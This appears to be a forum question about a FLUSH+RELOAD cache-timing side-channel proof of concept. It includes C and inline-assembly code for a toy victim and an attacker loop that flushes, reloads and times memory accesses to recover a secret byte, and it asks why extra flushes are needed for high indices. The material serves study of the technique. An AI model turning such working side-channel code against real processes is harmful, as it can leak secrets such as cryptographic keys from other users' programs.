Problem
I am putting together a proof of concept for the FLUSH + RELOAD attack. The method is outlined in great detail in this paper. The general idea is simple - cached addresses can be accessed with much greater speed than addresses not in the cache. By clearing the cache, running a victim process that accesses certain memory locations, then timing accesses to possible memory locations, we can learn about what memory the victim accessed.
The concept behind my proof of concept is also simple. I create an array of 256 pointers, each referencing a 512-size block in memory. The first time the victim is called, it will generate a "random" byte based on the smallest byte of the CPU's time stamp counter. Every subsequent time the victim is called, it will load a single byte from the memory location referenced by that secret byte's index in the pointer array.
void victim() {
unsigned int out;
if (!initted) {
asm __volatile__ (
"rdtsc\n"
"and rax, 0xff\n"
: "=a" (out)
: /* no inputs */
: /* no clobbers */
);
printf("Victim initialized. Secret byte: 0x%02x\n", out);
initted = 1;
}
asm __volatile__ (
"mov rsi, qword ptr [rbx + 8 * rax]\n"
"lodsb\n"
: /* no outputs */
: "b" (ptrs), "a" (out)
: "rsi"
);
return;
}
(Note that although the secret byte is saved to a global variable and printed to stdout
, this is purely for observing the attack, and other procedures never access that value.)
My attack process is given below:
void attacker() {
unsigned int i; unsigned int j; unsigned int ii;
unsigned int t;
for (j = 1; j <= 1000; j++) {
// here is the FLUSH part of the attack
for (i = 0; i < 256 + EXTRA; i++) {
asm __volatile__ (
"clflush byte ptr [rbx]\n"
: /* no outputs */
: "b" (ptrs[i])
: /* no clobbers */
);
}
// run the victim
victim();
// now, RELOAD and time
for (i = 0; i < 256; i++) {
asm __volatile__ (
"mfence\n"
"rdtsc\n"
"mov rcx, rax\n"
"lodsb\n"
"lfence\n" //ensure load happens
"rdtsc\n" //before re-reading counter
"sub rax, rcx\n"
"clflush byte ptr [rsi - 1]\n" //restore cache
: "=a" (t)
: "S" (ptrs[i])
: "rcx", "rdx"
);
times[i] += ((double) t - times[i]) / (double) j;
sched_yield();
}
}
return;
}
The different parts of the attack are clearly outlined in the comments. First, we FLUSH the cache using Intel's clflush
instruction on each of the pointers in the array. Then, we run victim()
, which should access exactly one of the addresses in the array. Finally, we perform RELOAD and timing. The process is repeated 1000 times and the access times are averaged to provide reliable timings.
My question lies in the FLUSH part of the attack. Notice that I flush more than just the pointer array, but also some addresses (EXTRA = 32
) higher than the array. Without this additional flushing (i.e., if we simply flush ptrs[i]
for i = 0..255
), the attack fails to yield significant timing differences for accesses to indices between 0xe8
and 0xff
. I have attached screenshots of the attack for the extra flushes enabled (Fig. 1) and disabled (Fig. 2).
Figure 1. Leaking the secret byte 0xf1
when extra flushing is enabled.
Figure 2. Unable to leak secret byte (0xed
) when there is no extra flushing.
Possible Explanations
It is possible that inside of the RELOAD loop, the CPU predicts that as it approaches the last few iterations, the extra performance gain that would be obtained by accessing the cache for a previously-saved value is overshadowed by the performance loss from visiting the cache for an address that has not shown up yet. To test this, I changed the for
loop into a while
loop and mixed up the accesses; i.e., I used an LCG-like accessing pattern where I start with index i_0
, then go to (a * i_0 + b) % 256
and so forth. However, while the attack still works for low secret bytes, it still fails for all bytes above ~0xe8
. If the loop prediction really was the problem, then we should expect to see a more random distribution of bytes that cannot be leaked, but this is not the case.
Although I am not completely sure, alignment of the 512-byte chunks is probably also not the problem. (Intel L-1 caches appear to be 8-way set associative with 64-byte line size.) I have ensured this by aligning each memory chunk to a grain size of 512.
Any ideas would be appreciated!